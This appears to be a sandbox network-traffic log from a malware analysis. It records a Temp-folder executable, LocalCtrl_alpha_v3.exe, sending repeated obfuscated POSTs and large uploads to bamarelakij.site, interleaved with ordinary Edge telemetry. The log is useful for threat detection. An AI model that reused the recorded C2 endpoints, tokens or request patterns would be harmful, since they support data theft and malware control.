2025-01-09 13:42:41 UTC | 5379 | OUT | Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 39 2e 33 32 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 36 38 34 39 38 34 2d 37 64 32 34 2d 34 65 38 34 2d 62 61 66 61 2d 62 31 39 30 39 63 61 65 66 31 66 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 34 30 33 31 39 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:42:39.326Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"b8684984-7d24-4e84-bafa-b1909caef1f2","epoch":"240319591"},"app":{"locale"
2025-01-09 13:42:41 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=2fb6ae680c174bb99eef245e38a9b657&HASH=2fb6&LV=202501&V=4&LU=1736430161556; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:41 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=2f3b6c8e83e2424cb792b26c5301b4c2; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:41 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2229
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Thu, 09 Jan 2025 13:42:41 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 50065 | 104.21.80.52 | 443 | 3824 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:41 UTC | 434 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 53
Host: bamarelakij.site
2025-01-09 13:42:41 UTC | 53 | OUT | Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 03 00 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii:
2025-01-09 13:42:41 UTC | 744 | IN | HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 13:42:41 GMT
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTW%2Bzjkj58aD7fH790HomqpPkz9Ee1c4pE3M1K8VFKZuepXIimwWqlrC4PfzuvnEsj1SEU9g6fE%2F2ayhNLuAYVoILyew65yaObO9ShglkEWlNSmRaZeEDzK1j0Y9XWiUsScy"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4da1dced17c96-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1805&rtt_var=699&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1123&delivery_rate=1542525&cwnd=173&unsent_bytes=0&cid=f6d00d9befc69026&ts=345&x=0"
2025-01-09 13:42:41 UTC | 29 | IN | Data Raw: 31 37 0d 0a 00 00 00 00 07 00 00 00 fe ff ff ff 00 00 00 00 91 91 ce 09 b6 a6 61 0d 0a
Data Ascii: 17a
2025-01-09 13:42:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                16192.168.2.75006440.79.167.84437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:41 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430159570&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Content-Length: 9880
                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                Accept: */*
                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=; _C_ETH=1
                                                                                                                                                                2025-01-09 13:42:41 UTC9880OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 39 2e 35 36 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 36 38 34 39 38 34 2d 37 64 32 34 2d 34 65 38 34 2d 62 61 66 61 2d 62 31 39 30 39 63 61 65 66 31 66 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 34 30 33 31 39 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-09T13:42:39.569Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"b8684984-7d24-4e84-bafa-b1909caef1f2","epoch":"240319591"},"app":{"loca
2025-01-09 13:42:41 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=4364e2c6231f4e6f83c9878c7f6c0c45&HASH=4364&LV=202501&V=4&LU=1736430161821; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:41 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=288c128b4bc24c9fa10b6a74d1dcc6b6; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:41 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2251
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Thu, 09 Jan 2025 13:42:41 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 50080 | 142.250.65.161 | 443 | 7832 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:51 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-09 13:42:51 UTC | 569 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 154477
X-GUploader-UploadID: AFiumC7I3mLFKPuqKq0QgTIrXmnqueHQVirH7f30b_yzeXj-yf0rCz3uucMObn1KuaKBemJZz3D071g
X-Goog-Hash: crc32c=F5qq4g==
Server: UploadServer
Date: Thu, 09 Jan 2025 12:51:14 GMT
Expires: Fri, 09 Jan 2026 12:51:14 GMT
Cache-Control: public, max-age=31536000
Age: 3097
Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 50084 | 104.21.80.52 | 443 | 6224 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:56 UTC | 438 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 130028
Host: bamarelakij.site
2025-01-09 13:42:57 UTC  814  IN  HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:42:57 GMT
Connection: close
pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sXUGYoBbMW76NsmIEy3VCfze8UWGa1nh%2Fxla%2B3EB7YXqxZLz%2FSFnlIU9BQWzWJTWndffgZu9hyahoCE8vyasUfEgS6I4MQaAknFWQxcqho2742fMplTvXM7lWWVasqNvC7m3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4da7a0bb643a9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1605&rtt_var=606&sent=56&recv=139&lost=0&retrans=0&sent_bytes=2838&recv_bytes=131454&delivery_rate=1799137&cwnd=245&unsent_bytes=0&cid=93d8fe4810b1575e&ts=802&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
19          192.168.2.7  50085        104.21.80.52    443               6224  C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-09 13:42:57 UTC  435                OUT        POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 745
Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:42:57 UTC745OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 c0 48 22 25 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 81 90 44 4a 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 81 90 44 4a 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0f 00 00 00 a7 00 00 00 84 03 ce 1a 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 2a 00 00 00 09 06 9d 34 00 00 00 00 25 81 25 2b 81 04 02 47 25 81 00 41 2b 81 02 02 47 25 81 00 41 00 00
                                                                                                                                                                Data Ascii: H"%G6DJ%!DJXZZG6*4%%+G%A+G%A
2025-01-09 13:42:58 UTC  811  IN  HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:42:58 GMT
Connection: close
pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OTUiQulqudRTstNFX1v74KLZTm4S40crXSeqq6KvReCxK%2FSyzwv4z3dOO%2Fuo%2FVyE5ksryVMnPCyjTvSNJiUW4VN%2FOgnSU5TfUN9eBtfQ5XghNwzlqfmVf6PxUDooHezVrRBz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4da840cfd42ee-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1622&rtt_var=627&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1816&delivery_rate=1800246&cwnd=218&unsent_bytes=0&cid=cfbecd58f8f3ada9&ts=318&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
20          192.168.2.7  50086        104.21.80.52    443               6224  C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-09 13:42:58 UTC  435                OUT        POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 212
Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:42:58 UTC212OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 99 00 00 00 70 0b 5f 20 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 0e 00 00 00 e0 16 be 40 00 00 00 00 27 81 81 25 81 23 00 00 00 00 00 c4 00 00 00 e0 16 be 40 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                Data Ascii: p_ G6@'%#@XZZ
2025-01-09 13:42:59 UTC  817  IN  HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:42:59 GMT
Connection: close
pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDkUrc6c6adV0exT0DRrUi9Te6H9zKQq2xvlJmM6bQGAtNtIeth%2Fuq1u%2Fw7yPSAHfxrn7WE%2FiKnhiJefbCs8jGYPq4SbSlVzTTesM5YiPsM%2Fd%2FtLG9n13h%2BIl71vvtO1%2BjEz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4da8a0a9442f7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1590&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1283&delivery_rate=1762220&cwnd=179&unsent_bytes=0&cid=f8b53ac77f3889dd&ts=318&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
21          192.168.2.7  50087        104.21.80.52    443               6224  C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-09 13:42:59 UTC  435                OUT        POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 380
Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:42:59 UTC380OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 1e 5a f7 29 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 3c b4 ef 52 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 3c b4 ef 52 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0f 00 00 00 94 00 00 00 13 6a 2a 23 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 04 00 00 00 26 d4 54 46 00 00 00 00 23 21 00 00 00 00 c4 00 00 00 26 d4 54 46 00 00 00 00 a0 96 0c 0c 58
                                                                                                                                                                Data Ascii: Z)G6<R%!<RXZZj*#G6&TF#!&TFX
2025-01-09 13:43:00 UTC  811  IN  HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:42:59 GMT
Connection: close
pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hG%2FbSgjPSNituORwPs4AOzhu6C4BIRnRBlb%2FRwa7bsafBO6JPkUaDkPQxD6lnxpG8Jq%2B0HGK6hE0K%2B0CpHDxfD7ni92xUf4Umoc4N25r5PAJM7fYmKGyJi250O0oswfwgVIu"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4da8fdf102361-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1810&rtt_var=701&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1451&delivery_rate=1537651&cwnd=241&unsent_bytes=0&cid=f761c9884fe822f6&ts=324&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
22          192.168.2.7  50088        104.21.80.52    443               6224  C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-09 13:43:00 UTC  436                OUT        POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 9953
Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:43:00 UTC9953OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 a6 26 00 00 eb bf 07 33 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 08 00 00 00 d7 7f 0e 66 00 00 00 00 27 81 00 21 00 00 00 00 e4 4c 00 00 d7 7f 0e 66 00 00 00 00 a0 96 06 08 5a 00 00 10 10 00 3e 56 92 b2 a4 c7 1a b9 ff ff ff ff ff ff ff ff 34 00 28 00 8e e4 c2 c4 c4 ca e4 b8 c8 ca e6 b8 82 a2 a4 8c 8a ac a4 a8 8e 98 5c d4 e0 ce 02 00 20 00 04 08 00 00 00 00 00 00 0e 08 00 00 00 00 00 00 02 04 08 fb f7 82 a2 a4 8c 8a ac a4 a8 8e 98 a4 a0 9c ac aa 9a 82 9a 90 a8 b2 8a a8 8a ac 8e 88 8a 9c 90 8a 90 b4 88 82 a2 a4 b0 b4 a2 86 88 90 90 98 a8 aa b4 92 8a 94 a4 86 a2 8e 8e a0 a4 a2 ae 84 92 b2 ae 82 88 ae 94 8a b4 a8 82 8a 98 8a a4 96 b4 aa 88 b4 94 90 a6 8c ac 92 aa a0 84 a8 94 ac 8e 96
                                                                                                                                                                Data Ascii: &3G6f'!LfZ>V4(\
2025-01-09 13:43:01 UTC  817  IN  HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:43:01 GMT
Connection: close
pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vL9kF5N8N0oX%2F0BEh88C0ZW4p4qMYa9ePY%2F62XADzmW4P5PI9RajIajuzx%2FKUlbBWVC2Edg4hbQ3Mlg%2Bjw%2BCgDdOWG5RAGiThgh9QyRjNoOsZp23K%2Bd3UJjIL6i6UtEXMMGS"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4da977fbf42e3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1552&rtt_var=603&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2838&recv_bytes=11047&delivery_rate=1783750&cwnd=209&unsent_bytes=0&cid=2ab3d9867a9fdb60&ts=294&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
23          192.168.2.7  50089        104.21.80.52    443               6224  C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-09 13:43:02 UTC  437                OUT        POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 70050
Host: bamarelakij.site
2025-01-09 13:43:03 UTC | 814 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:43:03 GMT
Connection: close
pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SD4rMPYrSYy9KSBgjShUWJVBR7%2By5JTeij3sXDvA0i6cpXbXEs3%2BgdMgLOY9t4iM4xUbWlpf3oofUcoavjl1n%2FWNaVgT3UYRkZuMDRQu0G8u8xJ8wEj5pvgBhOm%2BeFwflLUf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4daa36ae543ed-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1613&rtt_var=622&sent=30&recv=77&lost=0&retrans=0&sent_bytes=2838&recv_bytes=71321&delivery_rate=1733966&cwnd=210&unsent_bytes=0&cid=a8d0d8a2aa307cf4&ts=762&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 50090 | 104.21.80.52 | 443 | 6224 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp | Bytes transferred | Direction | Data
